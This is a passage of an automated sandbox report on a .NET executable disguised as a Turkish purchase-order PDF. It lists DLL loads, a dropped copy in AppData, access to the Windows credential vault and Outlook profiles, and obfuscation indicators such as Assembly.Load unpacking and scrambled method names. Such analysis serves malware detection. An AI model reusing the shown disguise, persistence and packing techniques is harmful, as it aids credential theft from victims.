                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: edputil.dll
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, tiGbCdWd4bev0iB2DA.cs.Net Code: XbrepSfTju System.Reflection.Assembly.Load(byte[])
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.6220000.8.raw.unpack, tiGbCdWd4bev0iB2DA.cs.Net Code: XbrepSfTju System.Reflection.Assembly.Load(byte[])
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.28887b4.1.raw.unpack, LoginForm.cs.Net Code: _206B_206C_202A_202D_206F_206F_206C_202D_206A_202A_200B_206C_206E_206A_206D_206B_202C_206E_200C_206F_200D_206D_200C_200F_202C_206C_202E_206B_202B_202E_206E_206B_206B_206D_206C_202C_200D_202E_202C_200E_202E System.Reflection.Assembly.Load(byte[])
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.50c0000.6.raw.unpack, LoginForm.cs.Net Code: _206B_206C_202A_202D_206F_206F_206C_202D_206A_202A_200B_206C_206E_206A_206D_206B_202C_206E_200C_206F_200D_206D_200C_200F_202C_206C_202E_206B_202B_202E_206E_206B_206B_206D_206C_202C_200D_202E_202C_200E_202E System.Reflection.Assembly.Load(byte[])
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeStatic PE information: 0xAA4E3A0D [Sat Jul 17 01:29:49 2060 UTC]
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_05AF64E9 push ebx; retf 10_2_05AF64EA
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_05AF5CB6 push 8B05AF5Dh; iretd 10_2_05AF5CBD
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 13_2_01314779 push esi; iretd 13_2_0131477A
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 13_2_0131477B push ebp; iretd 13_2_01314782
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 13_2_013147B1 push esi; iretd 13_2_013147B2
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 13_2_013146B8 push edx; iretd 13_2_013146BA
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 13_2_013146BB push edx; iretd 13_2_013146C2
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 13_2_0131AD27 pushfd ; iretd 13_2_0131AD2A
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 13_2_0131AD2B pushfd ; iretd 13_2_0131AD32
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeStatic PE information: section name: .text entropy: 7.925581129662268
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, mPiN3BBGyN7Z8OcVG1.csHigh entropy of concatenated method names: 'MoZgAVw4EH', 'dgsgtbg38C', 'b1cgbwE0ji', 'iWIgK3n6AP', 'KkngaGDruw', 'OHBgTn0G81', 'TDog5kwoCt', 'qwIgvPEB12', 'JlAglVpj4p', 'vcQg1C6pKv'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, rvSQ3JDQBZfG7TKqRV.csHigh entropy of concatenated method names: 'WkbybJwtnm', 'KEtyKDqej2', 'e4YysLhycr', 'RAEyflIq3m', 'jamyGsaaIG', 'cmWyJHf20h', 'UdNyN9bCqj', 'IayyHTwbCc', 'nkjycvSmwZ', 'yoQy8npDdZ'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, d8xT5fphNsaLn4YbFg.csHigh entropy of concatenated method names: 'YZ96YdGBNj', 'sX06mrR5Yk', 'K4T6pSpYNv', 'LOl6AIdmrX', 'CUN6nAY3kc', 'aGT6tBUEuS', 'UR56WIDmhq', 'O7g6byFvRs', 'BI46K56XKa', 'Sbm6BpdWR1'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, Xty0axU2Oxr1MyKjtV.csHigh entropy of concatenated method names: 'xxePrelrt3', 'DtkP4VWX59', 'o00PFFFndG', 'sYQP6hDe6y', 'GirP3QHk0B', 'VtHFDQfIJ9', 'vWqFSNrt0S', 'VOYFuL8Y13', 'WgiFkFkA2P', 'AV0FdNXKFw'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, fPPIjUKcIE0AwPG6ao.csHigh entropy of concatenated method names: 'gQq5EnSY0T', 'SFf5ibKM3d', 'ToString', 'Dq55InXdKw', 'xpf54IUW1e', 'YfQ5gdlkjT', 'fb95FmVXsE', 'kKO5PEQxdQ', 'X7V56mlbEp', 'lB053yQARe'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, zCBZmxLdu5DgsAtfw8.csHigh entropy of concatenated method names: 'S0vvI4BwgW', 'pXPv42fAb4', 'o54vgGg9ki', 'lU1vFOt87t', 'PS8vPolYJ1', 'TNKv6IWGjN', 'vKMv3BSnY6', 'd98v941gZq', 'Cx6vEUWVRE', 'WUavi3sAOg'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, wfZwUg997eENp4pIky.csHigh entropy of concatenated method names: 'uCA5kbpaNI', 'sV9507Lc9y', 'uW9v290cSK', 'VJ5vXF65U3', 'NeQ58w9hN3', 'LAQ5xGSAF1', 'xaR5LlqpvW', 'rhi5qt3dvN', 'RjF5Z4jVuy', 'BwS5RElftT'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, B80lBRzEuJQ2gVHNPN.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LB5lyEU4Wf', 'abWlaIvBle', 'fnXlTVLg7Y', 'iS6l59tnLs', 'weblvKo16T', 'lgFllow211', 'zVKl19KOSi'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, I3npwBYQQFuv23683C.csHigh entropy of concatenated method names: 'Dispose', 'YEyXdovVy3', 'cJ1Mf6cgnO', 'vi377Gjyn0', 'EqoX03pIa5', 'HT3XzUNTMS', 'ProcessDialogKey', 'M5XM2I8gTJ', 'LauMXuIpdO', 'otSMMq85wh'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, Eg53fQuaiL3x0mTkch.csHigh entropy of concatenated method names: 'i98FnP2V2o', 'c0WFWuB4HT', 'baigQOyrZ7', 'tUtgGHwHgv', 'ktmgJE9GnD', 'lVDgoDhrwv', 'CedgN56aSP', 'jAdgHdJr8I', 'BIqghbcdg6', 'w5egcOrtp2'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, bgc4mo1Zqy4jEgX7FWt.csHigh entropy of concatenated method names: 'Kj9lYgTn1Z', 'SYUlmB4tSJ', 'FCtlpAfVId', 'e3elAOwOXT', 'cTTln7qqmf', 'nmQltpIv8j', 'csDlWbqKAn', 'Ei6lb9xsxA', 'hqplKBV1HS', 'VEIlBLJdiD'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, v6uhagkvHfUiDoPBAd.csHigh entropy of concatenated method names: 'okm6ICFfnm', 'gyN6g0n3qQ', 'u6j6PlYo5E', 'uuPP0ncv0Z', 'AuBPzoKMFN', 'M8q62X3iJG', 'Rjq6XA87wW', 'oo56MBCFHp', 'jLU6jY3BLi', 'Ohu6ey33XO'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, x6JxON1fwtwdPv1xTFC.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'r7G1qyhX7A', 'II81Z91QFb', 'txD1RcIZVE', 'GNt1OcUQar', 'BMM1DfKuRV', 'Txn1SHNL32', 'Fp31uwPxnP'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, ntOxXKIEe5iRt4Qe5q.csHigh entropy of concatenated method names: 'BJfp6K3y4', 'udFAjHXac', 'xU4tgXgXE', 'u5vWMCBb9', 'jreKZ2qXL', 'bwfBQWgCP', 'ayfG47kdllTypplx7N', 'xcdbQeAQiFtNTEYDTt', 'HEIvVbrSx', 'O7d1wJbA2'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, BIfda5lRrt3Eiso9an.csHigh entropy of concatenated method names: 'Eg04qm49oX', 'TIt4Z8Qlyf', 'UMa4R3fm82', 'kac4OUuKdk', 'Wdf4DSV9aD', 'G7V4Sihgmp', 'w7M4ufvsLm', 'TL34k36rvX', 'MTZ4dYNSJH', 'KCL40y22cd'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, tiGbCdWd4bev0iB2DA.csHigh entropy of concatenated method names: 'iSZjrFLIIU', 'pc4jIybYG3', 'G73j4DnXe1', 'eKnjgq4lYe', 'cpbjF8yDPn', 'FT6jPiMRQC', 'Xu8j6rL2D1', 'zG7j3vuZ6g', 'pvej9DimmY', 'P5LjEediRc'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, T6xyn5eNsSbpx3PLt2.csHigh entropy of concatenated method names: 'lwvlXEjwdG', 'd8wljijiCv', 'b0alelYUAL', 'jhelIeGOLx', 'R0dl4IANpm', 'noelFF19Y2', 'gFLlPBBodY', 'CMCvu3DOMJ', 'jY7vkbiMmP', 'bIGvdeKITt'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, yfxSClFQMwFmEK7MNd.csHigh entropy of concatenated method names: 'gHYvs0YqNq', 'xXQvfKbqp5', 'tfdvQIUkdA', 'pltvGVRaKY', 'CpDvqD8f8h', 'vcTvJNwC5r', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, yOgMYxXHsaP1Od2Zjt.csHigh entropy of concatenated method names: 'aNHacmHOro', 'xMWaxRQQUG', 'SfvaqVYQoG', 'UQraZGtIqa', 'vu1af1NpbH', 'dP6aQb5iT0', 'unqaGn8lRE', 'uuAaJkefs4', 'K0OaoreKTI', 'AsjaNJUqe2'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, Crn3a66HqHiB80qX1X.csHigh entropy of concatenated method names: 'byBX6yw6N1', 'gFcX3qYBKN', 'bYhXEmXc63', 'Y28XiYegO4', 'YHyXabcPCo', 'aRpXTe7ppB', 'I1hYLgEn8P4amhhEat', 'm3sFc9LipkykZ3H8j3', 'ktaXXJZpfh', 'T6cXjwG0HS'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.6220000.8.raw.unpack, mPiN3BBGyN7Z8OcVG1.csHigh entropy of concatenated method names: 'MoZgAVw4EH', 'dgsgtbg38C', 'b1cgbwE0ji', 'iWIgK3n6AP', 'KkngaGDruw', 'OHBgTn0G81', 'TDog5kwoCt', 'qwIgvPEB12', 'JlAglVpj4p', 'vcQg1C6pKv'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.6220000.8.raw.unpack, rvSQ3JDQBZfG7TKqRV.csHigh entropy of concatenated method names: 'WkbybJwtnm', 'KEtyKDqej2', 'e4YysLhycr', 'RAEyflIq3m', 'jamyGsaaIG', 'cmWyJHf20h', 'UdNyN9bCqj', 'IayyHTwbCc', 'nkjycvSmwZ', 'yoQy8npDdZ'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.6220000.8.raw.unpack, d8xT5fphNsaLn4YbFg.csHigh entropy of concatenated method names: 'YZ96YdGBNj', 'sX06mrR5Yk', 'K4T6pSpYNv', 'LOl6AIdmrX', 'CUN6nAY3kc', 'aGT6tBUEuS', 'UR56WIDmhq', 'O7g6byFvRs', 'BI46K56XKa', 'Sbm6BpdWR1'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.6220000.8.raw.unpack, Xty0axU2Oxr1MyKjtV.csHigh entropy of concatenated method names: 'xxePrelrt3', 'DtkP4VWX59', 'o00PFFFndG', 'sYQP6hDe6y', 'GirP3QHk0B', 'VtHFDQfIJ9', 'vWqFSNrt0S', 'VOYFuL8Y13', 'WgiFkFkA2P', 'AV0FdNXKFw'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.6220000.8.raw.unpack, fPPIjUKcIE0AwPG6ao.csHigh entropy of concatenated method names: 'gQq5EnSY0T', 'SFf5ibKM3d', 'ToString', 'Dq55InXdKw', 'xpf54IUW1e', 'YfQ5gdlkjT', 'fb95FmVXsE', 'kKO5PEQxdQ', 'X7V56mlbEp', 'lB053yQARe'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.6220000.8.raw.unpack, zCBZmxLdu5DgsAtfw8.csHigh entropy of concatenated method names: 'S0vvI4BwgW', 'pXPv42fAb4', 'o54vgGg9ki', 'lU1vFOt87t', 'PS8vPolYJ1', 'TNKv6IWGjN', 'vKMv3BSnY6', 'd98v941gZq', 'Cx6vEUWVRE', 'WUavi3sAOg'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.6220000.8.raw.unpack, wfZwUg997eENp4pIky.csHigh entropy of concatenated method names: 'uCA5kbpaNI', 'sV9507Lc9y', 'uW9v290cSK', 'VJ5vXF65U3', 'NeQ58w9hN3', 'LAQ5xGSAF1', 'xaR5LlqpvW', 'rhi5qt3dvN', 'RjF5Z4jVuy', 'BwS5RElftT'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.6220000.8.raw.unpack, B80lBRzEuJQ2gVHNPN.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LB5lyEU4Wf', 'abWlaIvBle', 'fnXlTVLg7Y', 'iS6l59tnLs', 'weblvKo16T', 'lgFllow211', 'zVKl19KOSi'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.6220000.8.raw.unpack, I3npwBYQQFuv23683C.csHigh entropy of concatenated method names: 'Dispose', 'YEyXdovVy3', 'cJ1Mf6cgnO', 'vi377Gjyn0', 'EqoX03pIa5', 'HT3XzUNTMS', 'ProcessDialogKey', 'M5XM2I8gTJ', 'LauMXuIpdO', 'otSMMq85wh'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.6220000.8.raw.unpack, Eg53fQuaiL3x0mTkch.csHigh entropy of concatenated method names: 'i98FnP2V2o', 'c0WFWuB4HT', 'baigQOyrZ7', 'tUtgGHwHgv', 'ktmgJE9GnD', 'lVDgoDhrwv', 'CedgN56aSP', 'jAdgHdJr8I', 'BIqghbcdg6', 'w5egcOrtp2'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.6220000.8.raw.unpack, bgc4mo1Zqy4jEgX7FWt.csHigh entropy of concatenated method names: 'Kj9lYgTn1Z', 'SYUlmB4tSJ', 'FCtlpAfVId', 'e3elAOwOXT', 'cTTln7qqmf', 'nmQltpIv8j', 'csDlWbqKAn', 'Ei6lb9xsxA', 'hqplKBV1HS', 'VEIlBLJdiD'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.6220000.8.raw.unpack, v6uhagkvHfUiDoPBAd.csHigh entropy of concatenated method names: 'okm6ICFfnm', 'gyN6g0n3qQ', 'u6j6PlYo5E', 'uuPP0ncv0Z', 'AuBPzoKMFN', 'M8q62X3iJG', 'Rjq6XA87wW', 'oo56MBCFHp', 'jLU6jY3BLi', 'Ohu6ey33XO'
